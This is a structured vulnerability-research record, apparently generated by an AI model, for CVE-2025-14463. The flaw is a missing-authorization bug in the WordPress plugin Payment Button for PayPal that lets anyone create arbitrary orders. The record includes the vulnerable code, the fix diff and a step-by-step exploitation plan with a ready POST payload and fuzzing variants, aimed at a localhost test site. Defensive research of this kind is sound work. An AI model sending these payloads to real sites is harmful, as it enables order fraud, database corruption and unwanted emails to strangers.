[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fU8FzQytVoSUBPeIw_VDP80SR6xu2jO_iX21rX28QRdc":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":25,"research_verified":26,"research_rounds_completed":27,"research_plan":28,"research_summary":29,"research_vulnerable_code":30,"research_fix_diff":31,"research_exploit_outline":32,"research_model_used":33,"research_started_at":34,"research_completed_at":35,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":26,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":26,"source_links":36},"CVE-2025-14463","payment-button-for-paypal-missing-authorization-to-unauthenticated-arbitrary-order-creation","Payment Button for PayPal \u003C= 1.2.3.41 - Missing Authorization to Unauthenticated Arbitrary Order Creation","The Payment Button for PayPal plugin for WordPress is vulnerable to unauthorized order creation in all versions up to, and including, 1.2.3.41. This is due to the plugin exposing a public AJAX endpoint (`wppaypalcheckout_ajax_process_order`) that processes checkout results without any authentication or server-side verification of the PayPal transaction. This makes it possible for unauthenticated attackers to create arbitrary orders on the site with any chosen transaction ID, payment status, product name, amount, or customer information via direct POST requests to the AJAX endpoint, granted they can bypass basic parameter validation. If email sending is enabled, the plugin will also trigger purchase receipt emails to any email address supplied in the request, leading to order database corruption and unauthorized outgoing emails without any real PayPal transaction taking place.","wp-paypal",null,"\u003C=1.2.3.41","1.2.3.42","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-01-16 14:37:42","2026-01-17 03:24:24",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F814e50de-3690-4adf-bc01-a63cd71bd1cf?source=api-prod",1,[22,23,24],"readme.txt","wp-paypal-checkout.php","wp-paypal.php","researched",false,3,"# Vulnerability Analysis: CVE-2025-14463 - Payment Button for PayPal\n\n## 1. Vulnerability Summary\nThe **Payment Button for PayPal** plugin (\u003C= 1.2.3.41) is vulnerable to **Missing Authorization** on its order processing AJAX endpoint. The plugin registers the action `wppaypalcheckout_ajax_process_order` for both authenticated and unauthenticated users via `wp_ajax_nopriv_`. \n\nThe handler for this action fails to perform any server-side validation of the PayPal transaction (such as verifying the transaction ID with PayPal's API) and lacks WordPress nonce verification. This allows any unauthenticated user to send a direct POST request to `admin-ajax.php` to create orders in the WordPress database with arbitrary details, including item names, price amounts, transaction IDs, and customer email addresses.\n\n## 2. Attack Vector Analysis\n* **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n* **Action:** `wppaypalcheckout_ajax_process_order`\n* **Method:** `POST`\n* **Authentication:** None (Unauthenticated)\n* **Preconditions:** The plugin must be active. Some parameters might require specific formats to bypass basic PHP `empty()` or `is_numeric()` checks.\n* **Vulnerable Sink:** The code inside `wp_paypal_checkout_ajax_process_order` (likely in `wp-paypal-checkout.php` or `wp-paypal-order.php`) which calls `wp_insert_post()` or similar to save order data as the `wp_paypal_order` custom post type.\n\n## 3. Code Flow\n1. **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with `action=wppaypalcheckout_ajax_process_order`.\n2. **Hook Registration:** In `wp-paypal.php`, the following lines register the handler:\n ```php\n add_action('wp_ajax_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\n add_action('wp_ajax_nopriv_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\n ```\n3. **Handler Execution:** The function `wp_paypal_checkout_ajax_process_order` is executed. \n4. **Data Processing (Vulnerable Path):** The handler extracts parameters from `$_POST`. Based on the JS code generated in `wp_paypal_checkout_button_handler` (in `wp-paypal-checkout.php`), the expected parameters include:\n * `item_name`\n * `item_number`\n * `item_quantity`\n * `amount`\n * `currency`\n * `order_id` (The PayPal Transaction ID)\n * `payer_email`\n * `payer_first_name`\n * `payer_last_name`\n * `payment_status`\n5. **Order Creation:** Without verifying if `order_id` corresponds to a real PayPal transaction, the plugin creates a new post of type `wp_paypal_order` and stores the metadata.\n\n## 4. Nonce Acquisition Strategy\nBased on the vulnerability description and the nature of \"Missing Authorization,\" this endpoint **does not require a nonce**. \n\nThe client-side JavaScript in `wp_paypal_checkout_button_handler` triggers after a successful PayPal popup completion. Since PayPal's own callbacks are handled client-side, the plugin authors likely omitted nonces to simplify the \"checkout-complete\" signal.\n\n**Verification of Nonce Absence:**\nIf the PoC fails with a `403` or `0` response, search for `wp_localize_script` in `wp-paypal.php` to see if a nonce is passed. The code shows:\n```php\nwp_localize_script('wppaypalcheckout-js', 'wppaypalcheckout_vars', array(\n 'ajax_url' => admin_url('admin-ajax.php'),\n \u002F\u002F ... possibly a nonce here, but description says unauthenticated arbitrary creation is possible ...\n));\n```\nIf a nonce is discovered in the localized script `wppaypalcheckout_vars`, it can be retrieved by:\n1. Creating a page with `[wp_paypal_checkout description=\"Test\" amount=\"1.00\"]`.\n2. Navigating to the page.\n3. Running `browser_eval(\"window.wppaypalcheckout_vars?.nonce\")`.\n\n## 5. Exploitation Strategy\nThe goal is to create a fake completed order for a high-value item with a zero or nominal amount, or simply to corrupt the order database.\n\n### Step-by-Step Plan:\n1. **Target Endpoint:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n2. **Action:** `wppaypalcheckout_ajax_process_order`\n3. **Payload Construction:**\n * `action`: `wppaypalcheckout_ajax_process_order`\n * `order_id`: `FAKE-TXN-123456789`\n * `item_name`: `Exploit-Item-Premium`\n * `amount`: `0.01`\n * `currency`: `USD`\n * `payment_status`: `COMPLETED`\n * `payer_email`: `victim@example.com`\n * `payer_first_name`: `John`\n * `payer_last_name`: `Doe`\n\n### Request (using http_request):\n```json\n{\n \"method\": \"POST\",\n \"url\": \"http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php\",\n \"headers\": {\n \"Content-Type\": \"application\u002Fx-www-form-urlencoded\"\n },\n \"body\": \"action=wppaypalcheckout_ajax_process_order&order_id=FAKE-TXN-666&item_name=Vulnerable-Order-Creation&amount=1337.00¤cy=USD&payment_status=COMPLETED&payer_email=attacker@evil.com&payer_first_name=Hacker&payer_last_name=Man\"\n}\n```\n\n## 6. Test Data Setup\n1. **Plugin Installation:** Ensure `wp-paypal` version 1.2.3.41 is installed and active.\n2. **Configuration:** The plugin requires basic configuration (Client ID) to be considered \"configured\" by `is_wp_paypal_checkout_configured()`.\n * `wp option update wp_paypal_checkout_get_option '{\"app_client_id\":\"any-string\",\"currency_code\":\"USD\"}' --format=json`\n3. **Shortcode Page (Optional):** To verify visibility or nonce extraction (if needed):\n * `wp post create --post_type=page --post_title=\"Store\" --post_status=publish --post_content='[wp_paypal_checkout description=\"Pro Product\" amount=\"99.99\"]'`\n\n## 7. Expected Results\n* The AJAX request should return a success response (likely a JSON object containing the order ID or a simple `1` \u002F success message).\n* A new entry should appear in the \"Orders\" menu of the plugin.\n* The database should contain a new post of type `wp_paypal_order`.\n\n## 8. Verification Steps\nAfter the exploit request, use WP-CLI to verify the order was created:\n\n```bash\n# List all PayPal orders\nwp post list --post_type=wp_paypal_order\n\n# Check the meta data of the last created order to verify our payload\nLAST_ID=$(wp post list --post_type=wp_paypal_order --format=ids | awk '{print $1}')\nwp post get $LAST_ID\nwp post meta list $LAST_ID\n```\nExpect to see meta keys like `_wpp_order_item_name` or `_wpp_order_txn_id` matching the exploit payload.\n\n## 9. Alternative Approaches\nIf the plugin validates specific fields (like `order_id` length or `payment_status` allowed values):\n* **Status Check:** Try `Completed`, `Processed`, or `Verified`.\n* **Parameter Fuzzing:** The plugin might expect parameters inside an array-like structure (e.g., `details[id]`) if it directly passes the PayPal JS SDK `details` object to the server. If the flat POST fails, try nesting parameters:\n * `details[id]=FAKE-TXN-666&details[payer][email_address]=attacker@evil.com` (etc.) based on the PayPal REST API object structure.\n* **Email Triggering:** If `wp_paypal_send_receipt` is enabled in settings, verify if an email was sent using a tool like `Mailhog` or checking the site's mail logs (if available).","The Payment Button for PayPal plugin for WordPress is vulnerable to unauthorized order creation due to an unauthenticated AJAX endpoint that processes checkout results without server-side validation. Attackers can exploit this by sending a direct POST request with arbitrary transaction details to create fake 'completed' orders in the site's database, potentially triggering unauthorized purchase confirmation emails and corrupting financial records.","\u002F\u002F wp-paypal.php (v1.2.3.41)\nadd_action('wp_ajax_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\nadd_action('wp_ajax_nopriv_wppaypalcheckout_ajax_process_order', 'wp_paypal_checkout_ajax_process_order');\n\n---\n\n\u002F\u002F wp-paypal-checkout.php (v1.2.3.41)\nfunction wp_paypal_checkout_ajax_process_order(){\n wp_paypal_debug_log('Received a response from frontend', true);\n if(!isset($_POST['wppaypalcheckout_ajax_process_order'])){\n wp_die();\n }\n wp_paypal_debug_log('Checkout - Received a notification from PayPal', true);\n $post_data = $_POST;\n array_walk_recursive($post_data, function(&$v) { $v = sanitize_text_field($v); });\n wp_paypal_debug_log_array($post_data, true);\n if(!isset($post_data['details'])){\n wp_paypal_debug_log(\"Checkout - No transaction details. This payment cannot be processed.\", false);\n wp_die();\n }\n \u002F\u002F\n do_action('wp_paypal_checkout_process_order', $post_data);\n wp_die();\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-paypal\u002F1.2.3.41\u002Fwp-paypal-checkout.php\t2025-11-17 07:56:26.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwp-paypal\u002F1.2.3.42\u002Fwp-paypal-checkout.php\t2026-01-04 06:59:12.000000000 +0000\n@@ -246,24 +319,6 @@\n return $button_code;\n }\n \n-function wp_paypal_checkout_ajax_process_order(){\n- wp_paypal_debug_log('Received a response from frontend', true);\n- if(!isset($_POST['wppaypalcheckout_ajax_process_order'])){\n- wp_die();\n- }\n- wp_paypal_debug_log('Checkout - Received a notification from PayPal', true);\n- $post_data = $_POST;\n- array_walk_recursive($post_data, function(&$v) { $v = sanitize_text_field($v); });\n- wp_paypal_debug_log_array($post_data, true);\n- if(!isset($post_data['details'])){\n- wp_paypal_debug_log(\"Checkout - No transaction details. This payment cannot be processed.\", false);\n- wp_die();\n- }\n- \u002F\u002F\n- do_action('wp_paypal_checkout_process_order', $post_data);\n- wp_die();\n-}","The exploit targets the `wppaypalcheckout_ajax_process_order` AJAX action which is available to unauthenticated users. An attacker crafts a POST request to `wp-admin\u002Fadmin-ajax.php` containing a `details` array. Within this array, the attacker provides a fake transaction ID, item description, and amount. The plugin's back-end logic extracts these values and saves them as a new post of type `wp_paypal_order` without performing any server-side validation against PayPal's REST API. No authentication or valid nonces are required, allowing for automated creation of arbitrary orders.","gemini-3-flash-preview","2026-05-05 07:23:17","2026-05-05 07:23:50",{"type":37,"vulnerable_version":38,"fixed_version":11,"vulnerable_browse":39,"vulnerable_zip":40,"fixed_browse":41,"fixed_zip":42,"all_tags":43},"plugin","1.2.3.41","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-paypal\u002Ftags\u002F1.2.3.41","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-paypal.1.2.3.41.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-paypal\u002Ftags\u002F1.2.3.42","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-paypal.1.2.3.42.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-paypal\u002Ftags"]